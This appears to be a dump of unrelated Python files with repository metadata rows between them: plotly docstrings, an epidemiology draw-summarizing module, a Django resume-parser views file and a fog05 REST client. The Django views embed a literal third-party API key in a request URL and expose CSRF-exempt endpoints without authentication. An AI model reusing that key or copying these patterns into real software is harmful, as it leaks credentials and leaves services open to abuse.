Sets the mid-point of the color domain by
scaling `marker.cmin` and/or `marker.cmax` to
be equidistant to this point. Has an effect
only if in `marker.color`is set to a numerical
array. Value should have the same units as in
`marker.color`. Has no effect when
`marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmax` must be set as well.
color
Sets themarkercolor. It accepts either a
specific color or an array of numbers that are
mapped to the colorscale relative to the max
and min values of the array or relative to
`marker.cmin` and `marker.cmax` if set.
coloraxis
Sets a reference to a shared color axis.
References to these shared color axes are
"coloraxis", "coloraxis2", "coloraxis3", etc.
Settings for these shared color axes are set in
the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple
color scales can be linked to the same color
axis.
colorbar
:class:`new_plotly.graph_objects.funnel.marker.Colo
rBar` instance or dict with compatible
properties
colorscale
Sets the colorscale. Has an effect only if in
`marker.color`is set to a numerical array. The
colorscale must be an array containing arrays
mapping a normalized value to an rgb, rgba,
hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and
highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in
color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may
be a palette name string of the following list:
Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,E
arth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
line
:class:`new_plotly.graph_objects.funnel.marker.Line
` instance or dict with compatible properties
opacity
Sets the opacity of the bars.
opacitysrc
Sets the source reference on Chart Studio Cloud
for opacity .
reversescale
Reverses the color mapping if true. Has an
effect only if in `marker.color`is set to a
numerical array. If true, `marker.cmin` will
correspond to the last color in the array and
`marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is
displayed for this trace. Has an effect only if
in `marker.color`is set to a numerical array.
""",
),
**kwargs
)
| [
"[email protected]"
]
| |
5f5c946119f93d0807da026d011f603897bc22be | 2e74c7339c63385172629eaa84680a85a4731ee9 | /functions/adding_machine/adding_machine/summarizers.py | e2c7e2177df872c5c6880129cd2080aec0c8204f | []
| no_license | zhusui/ihme-modeling | 04545182d0359adacd22984cb11c584c86e889c2 | dfd2fe2a23bd4a0799b49881cb9785f5c0512db3 | refs/heads/master | 2021-01-20T12:30:52.254363 | 2016-10-11T00:33:36 | 2016-10-11T00:33:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,857 | py | from __future__ import division
import pandas as pd
import agg_engine as ae
import os
import super_gopher
from functools32 import lru_cache
try:
from hierarchies import dbtrees
except:
from hierarchies.hierarchies import dbtrees
import numpy as np
from scipy import stats
from multiprocessing import Pool
import itertools
from db import EpiDB
this_file = os.path.abspath(__file__)
this_path = os.path.dirname(this_file)
@lru_cache()
def get_age_weights():
query = """
SELECT age_group_id, age_group_weight_value
FROM shared.age_group_weight
WHERE gbd_round_id = 3"""
db = EpiDB('epi')
eng = db.get_engine(db.dsn_name)
aws = pd.read_sql(query, eng)
return aws
@lru_cache()
def get_age_spans():
query = """
SELECT age_group_id, age_group_years_start, age_group_years_end
FROM shared.age_group"""
db = EpiDB('epi')
eng = db.get_engine(db.dsn_name)
ags = pd.read_sql(query, eng)
return ags
def get_pop(filters={}):
query = """
SELECT o.age_group_id, year_id, o.location_id, o.sex_id, pop_scaled
FROM mortality.output o
LEFT JOIN mortality.output_version ov using (output_version_id)
LEFT JOIN shared.age_group a using (age_group_id)
LEFT JOIN shared.location l using (location_id)
LEFT JOIN shared.sex s using (sex_id)
WHERE ov.is_best = 1
AND year_id >= 1980 AND year_id <= 2015"""
for k, v in filters.iteritems():
v = np.atleast_1d(v)
v = [str(i) for i in v]
query = query + " AND {k} IN ({vlist})".format(
k=k, vlist=",".join(v))
db = EpiDB('cod')
eng = db.get_engine(db.dsn_name)
pop = pd.read_sql(query, eng)
return pop
def combine_sexes_indf(df):
draw_cols = list(df.filter(like='draw').columns)
index_cols = list(set(df.columns) - set(draw_cols))
index_cols.remove('sex_id')
csdf = df.merge(
pop,
on=['location_id', 'year_id', 'age_group_id', 'sex_id'])
# assert len(csdf) == len(df), "Uh oh, some pops are missing..."
csdf = ae.aggregate(
csdf[index_cols+draw_cols+['pop_scaled']],
draw_cols,
index_cols,
'wtd_sum',
weight_col='pop_scaled')
csdf['sex_id'] = 3
return csdf
def combine_ages(df, gbd_compare_ags=False):
age_groups = {
22: (0, 200),
27: (0, 200)}
if gbd_compare_ags:
age_groups.update({
1: (0, 5),
23: (5, 15),
24: (15, 50),
25: (50, 70),
26: (70, 200)})
index_cols = ['location_id', 'year_id', 'measure_id', 'sex_id']
if 'cause_id' in df.columns:
index_cols.append('cause_id')
if 'sequela_id' in df.columns:
index_cols.append('sequela_id')
if 'rei_id' in df.columns:
index_cols.append('rei_id')
draw_cols = list(df.filter(like='draw').columns)
results = []
for age_group_id, span in age_groups.items():
if age_group_id in df.age_group_id.unique():
continue
# Get aggregate age cases
if age_group_id != 27:
wc = 'pop_scaled'
aadf = df.merge(ags)
aadf = aadf[
(span[0] <= aadf.age_group_years_start) &
(span[1] >= aadf.age_group_years_end)]
aadf.drop(
['age_group_years_start', 'age_group_years_end'],
axis=1,
inplace=True)
len_in = len(aadf)
aadf = aadf.merge(
pop,
on=['location_id', 'year_id', 'age_group_id', 'sex_id'],
how='left')
assert len(aadf) == len_in, "Uh oh, some pops are missing..."
else:
wc = 'age_group_weight_value'
aadf = df.merge(aw, on='age_group_id', how='left')
assert len(aadf) == len(df), "Uh oh, some weights are missing..."
aadf = ae.aggregate(
aadf[index_cols+draw_cols+[wc]],
draw_cols,
index_cols,
'wtd_sum',
weight_col=wc)
aadf['age_group_id'] = age_group_id
results.append(aadf)
results = pd.concat(results)
return results
def get_estimates(df):
""" Compute summaries """
summdf = df.copy()
summdf['mean'] = summdf.filter(like='draw').mean(axis=1)
summdf['median'] = np.median(
summdf.filter(like='draw').values,
axis=1)
summdf['lower'] = stats.scoreatpercentile(
summdf.filter(like='draw').values,
per=2.5,
axis=1)
summdf['upper'] = stats.scoreatpercentile(
summdf.filter(like='draw').values,
per=97.5,
axis=1)
nondraw_cols = set(summdf.columns)-set(summdf.filter(like='draw').columns)
return summdf[list(nondraw_cols)]
def pct_change(df, start_year, end_year, change_type='pct_change',
index_cols=None):
""" Compute pct change: either arc or regular pct_change (rate or num).
For pct_change in rates or arc pass in a df in rate space.
Otherwise, pass in a df in count space."""
# set up the incoming df to be passed into the math part
draw_cols = list(df.filter(like='draw').columns)
if not index_cols:
index_cols = list(set(df.columns) - set(draw_cols + ['year_id']))
df_s = df[df.year_id == start_year]
df_e = df[df.year_id == end_year]
df_s.drop('year_id', axis=1, inplace=True)
df_e.drop('year_id', axis=1, inplace=True)
df_s = df_s.merge(
df_e,
on=index_cols,
suffixes=(str(start_year), str(end_year)))
sdraws = ['draw_%s%s' % (d, start_year) for d in range(1000)]
edraws = ['draw_%s%s' % (d, end_year) for d in range(1000)]
# do the math
if change_type == 'pct_change':
cdraws = ((df_s[edraws].values - df_s[sdraws].values) /
df_s[sdraws].values)
emean = df_s[edraws].values.mean(axis=1)
smean = df_s[sdraws].values.mean(axis=1)
cmean = (emean - smean) / smean
# when any start year values are 0, we get division by zero = NaN/inf
cdraws[np.isnan(cdraws)] = 0
cdraws[np.isinf(cdraws)] = 0
cmean[np.isnan(cmean)] = 0
cmean[np.isinf(cmean)] = 0
elif change_type == 'arc':
# can't take a log of 0, so replace 0 with a miniscule number
adraws = sdraws + edraws
if (df_s[adraws].values == 0).any():
df_s[adraws] = df_s[adraws].replace(0, 1e-9)
gap = end_year - start_year
cdraws = np.log(df_s[edraws].values / df_s[sdraws].values) / gap
emean = df_s[edraws].values.mean(axis=1)
smean = df_s[sdraws].values.mean(axis=1)
cmean = np.log(emean / smean) / gap
else:
raise ValueError("change_type must be 'pct_change' or 'arc'")
# put the dataframes back together
cdraws = pd.DataFrame(cdraws, index=df_s.index, columns=draw_cols)
cdraws = cdraws.join(df_s[index_cols])
cmean = pd.DataFrame(cmean, index=df_s.index, columns=['pct_change_means'])
cdraws = cdraws.join(cmean)
cdraws['year_start_id'] = start_year
cdraws['year_end_id'] = end_year
cdraws = cdraws[
index_cols +
['year_start_id', 'year_end_id', 'pct_change_means'] +
draw_cols]
# output
return cdraws
def transform_metric(df, to_id, from_id):
"""Given a df, it's current metric_id (from_id)
and it's desired metric_id (to_id), transform metric space!"""
to_id = int(to_id)
from_id = int(from_id)
# TODO: Expand this for the other metrics too.
# Right not just doing number and rate for the get_pct_change shared fn.
valid_to = [1, 3]
assert to_id in valid_to, "Pass either 1 or 3 for the 'to_id' arg"
valid_from = [1, 3]
assert from_id in valid_from, "Pass either 1 or 3 for the 'from_id' arg"
merge_cols = ['location_id', 'year_id', 'age_group_id', 'sex_id']
if not df.index.is_integer:
df.reset_index(inplace=True)
for col in merge_cols:
assert col in df.columns, "Df must contain %s" % col
# find years and sexes in the df
years = df.year_id.unique()
sexes = df.sex_id.unique()
ages = df.age_group_id.unique()
locations = df.location_id.unique()
# get populations for those years and sexes
pop = get_pop({'year_id': years, 'sex_id': sexes,
'age_group_id': ages, 'location_id': locations})
# transform
draw_cols = list(df.filter(like='draw').columns)
new_df = df.merge(pop, on=merge_cols, how='inner')
if (to_id == 3 and from_id == 1):
for i in draw_cols:
new_df['%s' % i] = new_df['%s' % i] / new_df['pop_scaled']
elif (to_id == 1 and from_id == 3):
for i in draw_cols:
new_df['%s' % i] = new_df['%s' % i] * new_df['pop_scaled']
else:
raise ValueError("'to_id' and 'from_id' must be two unique numbers")
# put the dfs back together
if 'metric_id' in new_df.columns:
new_df['metric_id'].replace(from_id, to_id, axis=1, inplace=True)
else:
new_df['metric_id'] = to_id
new_df.drop('pop_scaled', axis=1, inplace=True)
return new_df
def summarize_location(
location_id,
drawdir,
sg=None,
years=[1990, 1995, 2000, 2005, 2010, 2015],
change_intervals=None,
combine_sexes=False,
force_age=False,
draw_filters={},
calc_counts=False,
gbd_compare_ags=False):
drawcols = ['draw_%s' % i for i in range(1000)]
if sg is None:
spec = super_gopher.known_specs[2]
sg = super_gopher.SuperGopher(spec, drawdir)
if change_intervals:
change_years = [i for i in itertools.chain(*change_intervals)]
else:
change_years = []
change_df = []
summary = []
for y in years:
df = sg.content(
location_id=location_id, year_id=y, sex_id=[1, 2],
**draw_filters)
if force_age:
df = df[df.age_group_id.isin(range(2, 22))]
if combine_sexes:
df = df[df.sex_id != 3]
cs = combine_sexes_indf(df)
df = df.append(cs)
df = df.append(combine_ages(df, gbd_compare_ags))
df['metric_id'] = 3
if ('cause_id' in df.columns) and ('rei_id' not in df.columns):
denom = df.ix[df.cause_id == 294].drop('cause_id', axis=1)
if len(denom) > 0:
mcols = list(set(denom.columns)-set(drawcols))
pctdf = df.merge(denom, on=mcols, suffixes=('_num', '_dnm'))
num = pctdf.filter(like="_num").values
dnm = pctdf.filter(like="_dnm").values
pctdf = pctdf.reset_index(drop=True)
pctdf = pctdf.join(pd.DataFrame(
data=num/dnm, index=pctdf.index, columns=drawcols))
pctdf = pctdf[mcols+['cause_id']+drawcols]
pctdf['metric_id'] = 2
df = pd.concat([df, pctdf])
if calc_counts:
popdf = df[df.metric_id == 3].merge(pop)
popdf['metric_id'] = 1
popdf.ix[:, drawcols] = (
popdf[drawcols].values.T * popdf.pop_scaled.values).T
popdf.drop('pop_scaled', axis=1, inplace=True)
summary.append(get_estimates(popdf))
summary.append(get_estimates(df))
if y in change_years:
change_df.append(df)
if calc_counts:
change_df.append(popdf)
summary = pd.concat(summary)
if change_intervals is not None:
change_df = pd.concat(change_df)
changesumms = []
for ci in change_intervals:
changedf = pct_change(change_df, ci[0], ci[1])
changesumms.append(get_estimates(changedf))
changesumms = pd.concat(changesumms)
changesumms['median'] = changesumms['pct_change_means']
else:
changesumms = pd.DataFrame()
return summary, changesumms
def slw(args):
try:
s, cs = summarize_location(*args[0], **args[1])
return s, cs
except Exception, e:
print args
print e
return None
def launch_summaries(
model_version_id,
env='dev',
years=[1990, 1995, 2000, 2005, 2010, 2015],
file_pattern='all_draws.h5',
h5_tablename='draws'):
global pop, aw, ags
pop = get_pop()
aw = get_age_weights()
ags = get_age_spans()
drawdir = '/ihme/epi/panda_cascade/%s/%s/full/draws' % (
env, model_version_id)
outdir = '/ihme/epi/panda_cascade/%s/%s/full/summaries' % (
env, model_version_id)
try:
os.makedirs(outdir)
os.chmod(outdir, 0o775)
os.chmod(os.path.join(outdir, '..'), 0o775)
os.chmod(os.path.join(outdir, '..', '..'), 0o775)
except:
pass
lt = dbtrees.loctree(None, location_set_id=35)
locs = [l.id for l in lt.nodes]
sg = super_gopher.SuperGopher({
'file_pattern': file_pattern,
'h5_tablename': h5_tablename},
drawdir)
pool = Pool(10)
res = pool.map(slw, [(
(l, drawdir, sg, years), {}) for l in locs])
pool.close()
pool.join()
res = [r for r in res if isinstance(r, tuple)]
res = zip(*res)
summ = pd.concat([r for r in res[0] if r is not None])
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'mean', 'lower', 'upper']]
summfile = "%s/model_estimate_final.csv" % outdir
summ.to_csv(summfile, index=False)
os.chmod(summfile, 0o775)
csumm = pd.concat(res[1])
if len(csumm) > 0:
csumm = csumm[[
'location_id', 'year_start', 'year_end', 'age_group_id', 'sex_id',
'measure_id', 'median', 'lower', 'upper']]
csummfile = "%s/change_summaries.csv" % outdir
csumm.to_csv(csummfile, index=False)
os.chmod(csummfile, 0o775)
def summ_lvl_meas(args):
drawdir, outdir, location_id, measure_id = args
try:
os.makedirs(outdir)
os.chmod(outdir, 0o775)
os.chmod(os.path.join(outdir, '..'), 0o775)
os.chmod(os.path.join(outdir, '..', '..'), 0o775)
except:
pass
try:
sg = super_gopher.SuperGopher({
'file_pattern': '{measure_id}_{location_id}_{year_id}_{sex_id}.h5',
'h5_tablename': 'draws'},
drawdir)
print 'Combining summaries %s %s...' % (drawdir, measure_id)
summ, csumm = summarize_location(
location_id,
drawdir,
sg,
change_intervals=[(2005, 2015), (1990, 2015), (1990, 2005)],
combine_sexes=True,
force_age=True,
calc_counts=True,
draw_filters={'measure_id': measure_id},
gbd_compare_ags=True)
if 'cause' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'cause_id', 'mean', 'lower',
'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'cause_id', 'metric_id'])
elif 'sequela' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'sequela_id', 'mean', 'lower',
'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'sequela_id', 'metric_id'])
elif 'rei' in drawdir:
summ = summ[[
'location_id', 'year_id', 'age_group_id', 'sex_id',
'measure_id', 'metric_id', 'rei_id', 'cause_id', 'mean',
'lower', 'upper']]
summ = summ.sort_values([
'measure_id', 'year_id', 'location_id', 'sex_id',
'age_group_id', 'rei_id', 'cause_id', 'metric_id'])
summfile = "%s/%s_%s_single_year.csv" % (
outdir, measure_id, location_id)
print 'Writing to file...'
summ = summ[summ['mean'].notnull()]
summ.to_csv(summfile, index=False)
os.chmod(summfile, 0o775)
if len(csumm) > 0:
if 'cause' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'cause_id',
'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'cause_id',
'metric_id'])
elif 'sequela' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'sequela_id',
'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'sequela_id',
'metric_id'])
elif 'rei' in drawdir:
csumm = csumm[[
'location_id', 'year_start_id', 'year_end_id',
'age_group_id', 'sex_id', 'measure_id', 'rei_id',
'cause_id', 'metric_id', 'median', 'lower', 'upper']]
csumm = csumm.sort_values([
'measure_id', 'year_start_id', 'year_end_id',
'location_id', 'sex_id', 'age_group_id', 'rei_id',
'cause_id', 'metric_id'])
csummfile = "%s/%s_%s_multi_year.csv" % (
outdir, measure_id, location_id)
csumm = csumm[
(csumm['median'].notnull()) & np.isfinite(csumm['median']) &
(csumm['lower'].notnull()) & np.isfinite(csumm['lower']) &
(csumm['upper'].notnull()) & np.isfinite(csumm['upper'])]
csumm.to_csv(csummfile, index=False)
os.chmod(csummfile, 0o775)
except Exception as e:
print e
def launch_summaries_como(draw_out_dirmap, location_id):
global pop, aw, ags
pop = get_pop({'location_id': location_id})
aw = get_age_weights()
ags = get_age_spans()
arglist = [(d, o, location_id, measure_id)
for d, o in draw_out_dirmap.iteritems()
for measure_id in [3, 5, 6, 22, 23, 24]]
pool = Pool(len(draw_out_dirmap)*3)
pool.map(summ_lvl_meas, arglist, chunksize=1)
pool.close()
pool.join()
| [
"[email protected]"
]
| |
ce4db0d1eefa29d48921b8c480811378e92db97a | b943d3c32cac2b4d9ab85753c0a611688fba82ad | /resume_parser/parser_app/views.py | 3379793d2e341273319f0dea8815914b786cd1c5 | [
"MIT"
]
| permissive | ashokraman/ResumeParser | 787e0d5fdc560c35630c1a78411e28725812a737 | 2238b7f3ea955f04cf5ccda619a15f62fcf066e3 | refs/heads/master | 2020-06-20T13:16:49.115304 | 2019-07-04T05:38:26 | 2019-07-04T05:38:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,190 | py | from django.shortcuts import render, redirect
from resume_parser import resume_parser
from .models import UserDetails, Competencies, MeasurableResults, Resume, ResumeDetails, UploadResumeModelForm
from django.contrib.auth.models import User
from django.contrib import messages
from django.conf import settings
from django.db import IntegrityError
from django.http import HttpResponse, FileResponse, Http404, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .serializers import UserDetailsSerializer, CompetenciesSerializer, MeasurableResultsSerializer, ResumeSerializer, ResumeDetailsSerializer
import os
import requests
def homepage(request):
if request.method == 'POST':
user = User.objects.get(id=1)
UserDetails.objects.filter(user=user).delete()
Competencies.objects.filter(user=user).delete()
MeasurableResults.objects.filter(user=user).delete()
Resume.objects.filter(user=user).delete()
ResumeDetails.objects.filter(resume__user=user).delete()
file_form = UploadResumeModelForm(request.POST, request.FILES)
files = request.FILES.getlist('resume')
if file_form.is_valid():
for file in files:
try:
user = User.objects.get(id=1)
# saving the file
resume = Resume(user=user, resume=file)
resume.save()
# extracting resume entities
parser = resume_parser.ResumeParser(os.path.join(settings.MEDIA_ROOT, resume.resume.name))
data = parser.get_extracted_data()
# User Details
# resume.name = data.get('name')
# resume.email = data.get('email')
# resume.education = get_education(data.get('education'))
user_details = UserDetails()
user_details.user = user
user_details.name = data.get('name')
user_details.email = data.get('email')
user_details.mobile_number = data.get('mobile_number')
user_details.skills = ', '.join(data.get('skills'))
user_details.years_of_exp = data.get('total_experience')
user_details.save()
for comp in data.get('competencies'):
competencies = Competencies()
competencies.user = user
competencies.competency = comp
competencies.save()
for mr in data.get('measurable_results'):
measurable_results = MeasurableResults()
measurable_results.user = user
measurable_results.measurable_result = mr
measurable_results.save()
# Resume Details
resume_details = ResumeDetails()
resume_details.resume = resume
resume_details.page_nos = data.get('no_of_pages')
resume_details.save()
# resume.experience = ', '.join(data.get('experience'))
# measurable_results.append(data.get('measurable_results'))
# resume.save()
except IntegrityError:
messages.warning(request, 'Duplicate resume found:', file.name)
return redirect('homepage')
resumes = Resume.objects.filter(user=User.objects.get(id=1))
user_detail = UserDetails.objects.get(user=user)
messages.success(request, 'Resumes uploaded!')
overall_score = 0
competencies = data.get('competencies')
measurable_results = data.get('measurable_results')
if competencies and measurable_results:
overall_score = competencies.get('score') + measurable_results.get('score')
if competencies:
context = {
'resumes': resumes,
'competencies': competencies,
'measurable_results': measurable_results,
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
else:
context = {
'resumes': resumes,
'competencies': [],
'measurable_results': [],
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
return render(request, 'base.html', context)
else:
form = UploadResumeModelForm()
return render(request, 'base.html', {'form': form})
def get_education(education):
'''
Helper function to display the education in human readable format
'''
education_string = ''
for edu in education:
education_string += edu[0] + ' (' + str(edu[1]) + '), '
return education_string.rstrip(', ')
@csrf_exempt
def user_detail(request, pk):
"""
Retrieve, update or delete a code snippet.
"""
try:
user = User.objects.get(pk=pk)
user_details = UserDetails.objects.get(user=user)
comp = Competencies.objects.filter(user=user)
mr = MeasurableResults.objects.filter(user=user)
resume = Resume.objects.get(user=user)
resume_details = ResumeDetails.objects.filter(resume=resume)
except UserDetails.DoesNotExist:
return HttpResponse(status=404)
except Competencies.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
comp_serializer = CompetenciesSerializer(comp, many=True)
mr_serializer = MeasurableResultsSerializer(mr, many=True)
resume_serializer = ResumeSerializer(resume)
resume_details_serializer = ResumeDetailsSerializer(resume_details, many=True)
user_details_serializer = UserDetailsSerializer(user_details)
data = {}
data['competencies'] = comp_serializer.data
data['measurable_results'] = mr_serializer.data
data['resume'] = resume_serializer.data
data['resume_details'] = resume_details_serializer.data
data['user_details'] = user_details_serializer.data
return JsonResponse(data)
@csrf_exempt
def job_recommendation(request):
if request.method == 'POST':
job_title = request.POST.get('job_title')
job_location = request.POST.get('job_location')
data = requests.get('https://api.ziprecruiter.com/jobs/v1?search=Python&location=Santa%20Monica&api_key=mqpqz4ev44nfu3n9brazrrix27yzipzm').json()
return JsonResponse(data) | [
"[email protected]"
]
| |
1bb398a7369351058579f2038fcb6b751f225a55 | f6b3d08c885d6265a90b8323e9633cd1eae9d15d | /fog05/web_api.py | e0106d9fc772dc61ee4643cf731c81a9ccbcca32 | [
"Apache-2.0"
]
| permissive | kartben/fog05 | ed3c3834c574c1e9d13aea8129fd251cea7d63a2 | b2f6557772c9feaf9d6a9ad5997b5c2206527c91 | refs/heads/master | 2020-03-18T21:21:27.633610 | 2018-05-23T09:25:50 | 2018-05-23T09:25:50 | 135,276,221 | 0 | 0 | null | 2018-05-29T09:54:48 | 2018-05-29T09:54:47 | null | UTF-8 | Python | false | false | 34,780 | py | from jsonschema import validate, ValidationError
from fog05 import Schemas
from dstore import Store
from enum import Enum
import re
import uuid
import json
import fnmatch
import time
import urllib3
import requests
class RESTStore(object):
def __init__(self, root, host, port):
self.root = root
self.host = host
self.port = port
def get(self, uri):
endpoint = "http://{}:{}/get/{}".format(self.host, self.port, uri)
resp = requests.get(endpoint)
return json.loads(resp.text)
def resolve(self, uri):
return self.get(uri)
def put(self, uri, value):
endpoint = "http://{}:{}/put/{}".format(self.host, self.port, uri)
resp = requests.put(endpoint, data={'value': value})
return json.loads(resp.text)
def dput(self, uri, value=None):
if value is None:
value = self.args2dict(uri.split('#')[-1])
endpoint = "http://{}:{}/dput/{}".format(self.host, self.port, uri)
resp = requests.patch(endpoint, data={'value': value})
return json.loads(resp.text)
def getAll(self, uri):
return self.get(uri)
def resolveAll(self, uri):
return self.get(uri)
def remove(self, uri):
endpoint = "http://{}:{}/remove/{}".format(self.host, self.port, uri)
resp = requests.delete(endpoint)
return json.loads(resp.text)
def dot2dict(self, dot_notation, value=None):
ld = []
tokens = dot_notation.split('.')
n_tokens = len(tokens)
for i in range(n_tokens, 0, -1):
if i == n_tokens and value is not None:
ld.append({tokens[i - 1]: value})
else:
ld.append({tokens[i - 1]: ld[-1]})
return ld[-1]
def args2dict(self, values):
data = {}
uri_values = values.split('&')
for tokens in uri_values:
v = tokens.split('=')[-1]
k = tokens.split('=')[0]
if len(k.split('.')) < 2:
data.update({k: v})
else:
d = self.dot2dict(k, v)
data.update(d)
return data
class FOSRESTStore(object):
"Helper class to interact with the Store"
def __init__(self, host, port, aroot, droot):
self.aroot = aroot
self.droot = droot
self.actual = RESTStore(aroot, host, port)
self.desired = RESTStore(droot, host, port)
def close(self):
'''
Close the store
:return: None
'''
return None
class WebAPI(object):
'''
This class allow the interaction with fog05 using simple Python3 API
Need the distributed store
'''
def __init__(self, host, port, sysid=0, store_id="python-api-rest"):
self.a_root = 'afos://{}'.format(sysid)
self.d_root = 'dfos://{}'.format(sysid)
self.store = FOSRESTStore(host, port, self.a_root, self.d_root)
self.manifest = self.Manifest(self.store)
self.node = self.Node(self.store)
self.plugin = self.Plugin(self.store)
self.network = self.Network(self.store)
self.entity = self.Entity(self.store)
self.image = self.Image(self.store)
self.flavor = self.Flavor(self.store)
class Manifest(object):
'''
This class encapsulates API for manifests
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def check(self, manifest, manifest_type):
'''
This method allow you to check if a manifest is write in the correct way
:param manifest: a dictionary rapresenting the JSON manifest
:param manifest_type: the manifest type from API.Manifest.Type
:return: boolean
'''
if manifest_type == self.Type.ENTITY:
t = manifest.get('type')
try:
if t == 'vm':
validate(manifest.get('entity_data'), Schemas.vm_schema)
elif t == 'container':
validate(manifest.get('entity_data'), Schemas.container_schema)
elif t == 'native':
validate(manifest.get('entity_data'), Schemas.native_schema)
elif t == 'ros2':
validate(manifest.get('entity_data'), Schemas.ros2_schema)
elif t == 'usvc':
return False
else:
return False
except ValidationError as ve:
return False
if manifest_type == self.Type.NETWORK:
try:
validate(manifest, Schemas.network_schema)
except ValidationError as ve:
return False
if manifest_type == self.Type.ENTITY:
try:
validate(manifest, Schemas.entity_schema)
except ValidationError as ve:
return False
return True
class Type(Enum):
'''
Manifest types
'''
ENTITY = 0
IMAGE = 1
FLAVOR = 3
NETWORK = 4
PLUGIN = 5
class Node(object):
'''
This class encapsulates the command for Node interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def list(self):
'''
Get all nodes in the current system/tenant
:return: list of tuples (uuid, hostname)
'''
nodes = []
uri = '{}/*'.format(self.store.aroot)
infos = self.store.actual.resolveAll(uri)
for i in infos:
if len(i[0].split('/')) == 4:
node_info = json.loads(i[1])
nodes.append((node_info.get('uuid'), node_info.get('name')))
return nodes
def info(self, node_uuid):
"""
Provide all information about a specific node
:param node_uuid: the uuid of the node you want info
:return: a dictionary with all information about the node
"""
if node_uuid is None:
return None
uri = '{}/{}'.format(self.store.aroot, node_uuid)
infos = self.store.actual.resolve(uri)
if infos is None:
return None
return json.loads(infos)
def plugins(self, node_uuid):
'''
Get the list of plugin installed on the specified node
:param node_uuid: the uuid of the node you want info
:return: a list of the plugins installed in the node with detailed informations
'''
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
response = self.store.actual.get(uri)
if response is not None:
return json.loads(response).get('plugins')
else:
return None
def search(self, search_dict):
'''
Will search for a node that match information provided in the parameter
:param search_dict: dictionary contains all information to match
:return: a list of node matching the dictionary
'''
pass
class Plugin(object):
'''
This class encapsulates the commands for Plugin interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Add a plugin to a node or to all node in the system/tenant
:param manifest: the dictionary representing the plugin manifes
:param node_uuid: optional the node in which add the plugin
:return: boolean
'''
manifest.update({'status':'add'})
plugins = {"plugins": [manifest]}
plugins = json.dumps(plugins).replace(' ', '')
if node_uuid is None:
uri = '{}/*/plugins'.format(self.store.droot)
else:
uri = '{}/{}/plugins'.format(self.store.droot, node_uuid)
res = self.store.desired.dput(uri, plugins)
if res:
return True
else:
return False
def remove(self, plugin_uuid, node_uuid=None):
'''
Will remove a plugin for a node or all nodes
:param plugin_uuid: the plugin you want to remove
:param node_uuid: optional the node that will remove the plugin
:return: boolean
'''
pass
def list(self, node_uuid=None):
'''
Same as API.Node.Plugins but can work for all node un the system, return a dictionary with key node uuid and value the plugin list
:param node_uuid: can be none
:return: dictionary {node_uuid, plugin list }
'''
if node_uuid is not None:
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
response = self.store.actual.get(uri)
if response is not None:
return {node_uuid:json.loads(response).get('plugins')}
else:
return None
plugins = {}
uri = '{}/*/plugins'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
pl = json.loads(i[1]).get('plugins')
plugins.update({id: pl})
return plugins
def search(self, search_dict, node_uuid=None):
'''
Will search for a plugin matching the dictionary in a single node or in all nodes
:param search_dict: dictionary contains all information to match
:param node_uuid: optional node uuid in which search
:return: a dictionary with {node_uuid, plugin uuid list} with matches
'''
pass
class Network(object):
'''
This class encapsulates the command for Network element interaction
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Add a network element to a node o to all nodes
:param manifest: dictionary representing the manifest of that network element
:param node_uuid: optional the node uuid in which add the network element
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is not None:
uri = '{}/{}/network/*/networks/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
else:
uri = '{}/*/network/*/networks/{}'.format(self.store.droot, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, net_uuid, node_uuid=None):
'''
Remove a network element form one or all nodes
